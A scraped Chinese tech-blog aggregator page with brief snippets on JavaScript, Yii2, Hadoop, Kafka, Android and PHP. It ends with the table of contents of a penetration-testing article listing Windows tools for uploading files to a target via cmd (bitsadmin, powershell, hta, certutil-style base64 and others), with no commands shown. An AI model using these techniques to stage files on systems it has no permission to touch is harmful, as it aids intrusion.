readOnly 和 readonly 不同，在做js开发时一定要注意函数大小写和jsp黄线的警告！！！我就经历过这么一件事：使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能，有的就不行，而且函数readOnly有黄线警告！！！就这样被折磨了不短时间！！！（期间使用过disable函数，但是发现disable函数之后后台接收不到前台的的数据！！！）
LABjs、RequireJS、SeaJS 介绍 dcj3sjt126com js Web
LABjs 的核心是 LAB（Loading and Blocking）：Loading 指异步并行加载，Blocking 是指同步等待执行。LABjs 通过优雅的语法（script 和 wait）实现了这两大特性，核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器，倡导的是一种模块化开发理念，核心价值是让 JavaScript 的模块化开发变得更
[应用结构]入口脚本 dcj3sjt126com PHP yii2
入口脚本入口脚本是应用启动流程中的第一环，一个应用（不管是网页应用还是控制台应用）只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。 Web 应用的入口脚本必须放在终端用户能够访问的目录下，通常命名为 index.php，也可以使用 Web 服务器能定位到的其他名称。控制台应用的入口脚本一般在应用根目录下命名为 yii（后缀为.php），该文
haoop shell命令 eksliang hadoop hadoop shell
cat chgrp chmod chown copyFromLocal copyToLocal cp du dus expunge get getmerge ls lsr mkdir movefromLocal mv put rm rmr setrep stat tail test text
MultiStateView不同的状态下显示不同的界面 gundumw100 android
只要将指定的view放在该控件里面，可以该view在不同的状态下显示不同的界面，这对ListView很有用，比如加载界面，空白界面，错误界面。而且这些见面由你指定布局，非常灵活。 PS：ListView虽然可以设置一个EmptyView，但使用起来不方便，不灵活，有点累赘。 <com.kennyc.view.MultiStateView xmlns:android=&qu
jQuery实现页面内锚点平滑跳转 ini JavaScript html jquery html5 css
平时我们做导航滚动到内容都是通过锚点来做，刷的一下就直接跳到内容了，没有一丝的滚动效果，而且 url 链接最后会有“小尾巴”，就像#keleyi，今天我就介绍一款 jquery 做的滚动的特效，既可以设置滚动速度，又可以在 url 链接上没有“小尾巴”。效果体验：http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码： &
kafka offset迁移 kane_xie kafka
在早前的kafka版本中（0.8.0），offset是被存储在zookeeper中的。到当前版本（0.8.2）为止，kafka同时支持offset存储在zookeeper和offset manager（broker）中。从官方的说明来看，未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话，可以考虑在合适
android > 搭建 cordova 环境 mft8899 android
1 , 安装 node.js http://nodejs.org node -v 查看版本 2, 安装 npm 可以先从 https://github.com/isaacs/npm/tags 下载源码解压到
java封装的比较器，比较是否全相同，获取不同字段名字 qifeifei
非常实用的java比较器，贴上代码： import java.util.HashSet; import java.util.List; import java.util.Set; import net.sf.json.JSONArray; import net.sf.json.JSONObject; import net.sf.json.JsonConfig; i
记录一些函数用法 .Aky. 位运算 PHP 数据库函数 IP
高手们照旧忽略。想弄个全天朝IP段数据库，找了个今天最新更新的国内所有运营商IP段，copy到文件，用文件函数，字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件，直接用phpmyadmin导入.csv文件的形式导入。（生命在于折腾，也许你们觉得我傻X，直接下载人家弄好的导入不就可以，做自己的菜鸟，让别人去说吧）当然用到了ip2long()函数把字符串转为整型数
sublime text 3 rust wudixiaotie Sublime Text
1.sublime text 3 => install package => Rust 2.cd ~/.config/sublime-text-3/Packages 3.mkdir rust 4.git clone https://github.com/sp0/rust-style 5.cd rust-style 6.cargo build --release 7.ctrl

渗透技巧——通过cmd上传文件的N种方法

渗透技巧——通过cmd上传文件的N种方法

0x00 前言

0x02 测试环境

0x03 通用上传方法

1、 debug

2、ftp

3、vbs

4、powershell

5、csc

6、JScript

7、hta

8、bitsadmin

9、base64

0x04 补充上传方法

1、wget：

2、ftfp

0x05 小结

0x06 参考资料

为您推荐了适合您的技术文章:

你可能感兴趣的:(windows,三好大神)